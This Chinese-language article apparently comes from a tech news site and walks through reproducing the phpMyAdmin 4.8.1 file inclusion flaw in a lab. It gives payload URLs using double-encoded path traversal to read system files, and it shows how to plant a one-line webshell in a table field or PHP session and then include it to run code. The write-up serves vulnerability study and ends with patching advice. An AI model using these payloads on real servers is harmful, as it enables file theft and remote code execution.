溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

發(fā)布時間:2021-10-18 15:48:26 來源:億速云 閱讀:187 作者:柒染 欄目:安全技術(shù)

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn),很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

0x00簡介

phpMyAdmin 是一個以PHP為基礎(chǔ),以Web-Base方式架構(gòu)在網(wǎng)站主機上的MySQL的數(shù)據(jù)庫管理工具,讓管理者可用Web接口管理MySQL數(shù)據(jù)庫。借由此Web接口可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優(yōu)勢在于由于phpMyAdmin跟其他PHP程式一樣在網(wǎng)頁服務(wù)器上執(zhí)行,但是您可以在任何地方使用這些程式產(chǎn)生的HTML頁面,也就是于遠端管理MySQL數(shù)據(jù)庫,方便的建立、修改、刪除數(shù)據(jù)庫及資料表。也可借由phpMyAdmin建立常用的php語法,方便編寫網(wǎng)頁時所需要的sql語法正確性。

0x01漏洞概述

攻擊者利用發(fā)現(xiàn)在服務(wù)器上包含(查看和潛在執(zhí)行)文件的漏洞。該漏洞來自一部分代碼,其中頁面在phpMyAdmin中被重定向和加載,以及對白名單頁面進行不正確的測試。 攻擊者必須經(jīng)過身份驗證,但在這些情況下除外:

$ cfg [‘AllowArbitraryServer’] = true:攻擊者可以指定他/她已經(jīng)控制的任何主機,并在phpMyAdmin上執(zhí)行任意代碼;

$ cfg [‘ServerDefault’] = 0:這會繞過登錄并在沒有任何身份驗證的情況下運行易受攻擊的代碼。

0x02影響范圍

phpMyAdmin 4.8.0

phpMyAdmin 4.8.1

0x03環(huán)境搭建

phpstudy2018+phpmyadmin4.8.1

1.下載phpstudy2018然后刪除自帶的phpmyadmin

下載地址:http://public.xp.cn/upgrades/PhpStudy2018.zip

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

2.下載phpmyadmin4.8.1版本

下載地址:https://www.phpmyadmin.net/files/

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

3.把下載好的phpmyadmin放入phpstudy的www目錄下重新命名

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

4.在瀏覽器查看phpmyadmin的版本

http://your-IP/phpmyadmin/README

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

0x04漏洞復(fù)現(xiàn)

1.在瀏覽器打開phpmyadmin,需要使用賬號登錄進去 //略顯雞肋

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

2.方法一、登錄進去在首頁輸入以下payload

http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../Windows\win.ini

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

3.在test數(shù)據(jù)庫中創(chuàng)建一個表,然后在表中創(chuàng)建一個字段為一句話木馬

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

4.在受害機查看MySQL/data對應(yīng)數(shù)據(jù)庫下生成一個frm文件是否寫入進去,使用記事本打開

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

5.使用文件包含,包含此路徑下的文件

http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../phpStudy\PHPTutorial\MySQL\data\test\demo.frm

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

6.方法二、通過 phpsession序列化數(shù)據(jù)保存至session文件,包含其緩存文件。通過一句話木馬,進而包含sess_sessionId文件。

6.1、在最新sql語句的地方執(zhí)行以下命令

select ‘<?php phpinfo() ?>’;

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

6.2、使用F12查看網(wǎng)站Session值,查看當前頁面cookie中的phpmyadmin的值

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

6.3、使用文件包含包含此目錄下的Session值的URL路徑

如何理解phpMyAdmin文件包含漏洞復(fù)現(xiàn)

0x05修復(fù)建議

1. 建議使用最新版本的phpmyadmin

2. 使用復(fù)雜的賬號密碼

看完上述內(nèi)容是否對您有幫助呢?如果還想對相關(guān)知識有進一步的了解或閱讀更多相關(guān)文章,請關(guān)注億速云行業(yè)資訊頻道,感謝您對億速云的支持。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI